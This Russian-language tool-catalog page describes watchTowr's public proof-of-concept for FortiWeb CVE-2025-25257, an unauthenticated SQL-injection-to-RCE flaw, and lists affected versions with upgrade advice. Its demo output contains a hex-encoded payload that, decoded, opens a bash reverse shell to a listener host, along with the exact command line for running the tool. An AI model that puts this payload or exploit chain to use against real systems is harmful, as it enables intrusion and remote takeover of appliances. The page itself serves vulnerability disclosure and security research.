Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/watchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257

watchTowr-vs-FortiWeb-CVE-2025-25257

Генератор артефактов обнаружения для FortiWeb CVE-2025-25257, эксплуатирующий неаутентифицированную SQL-инъекцию для достижения удалённого выполнения кода через распыление hex-кодированных полезных нагрузок.

Репозиторий
1002431 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

watchTowr-vs-FortiWeb-CVE-2025-25257

Генератор артефактов обнаружения для FortiWeb CVE-2025-25257

Технические подробности см. в нашем посте в блоге

https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194

Демонстрация работы

root@kitploit:~
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

Описание

Этот скрипт пытается определить, уязвим ли FortiWeb к CVE-2025-25257

Затронутые версии

Затронуты следующие версии FortiWeb:

ВерсияЗатронутые версииРешение
FortiWeb 7.6с 7.6.0 по 7.6.3Обновитесь до 7.6.4 или выше
FortiWeb 7.4с 7.4.0 по 7.4.7Обновитесь до 7.4.8 или выше
FortiWeb 7.2с 7.2.0 по 7.2.10Обновитесь до 7.2.11 или выше
FortiWeb 7.0с 7.0.0 по 7.0.10Обновитесь до 7.0.11 или выше

Для получения дополнительной информации посетите FortiGuard Labs PSIRT

Следите за watchTowr Labs

За последними результатами исследований в области безопасности следите за командой watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Скачать инструмент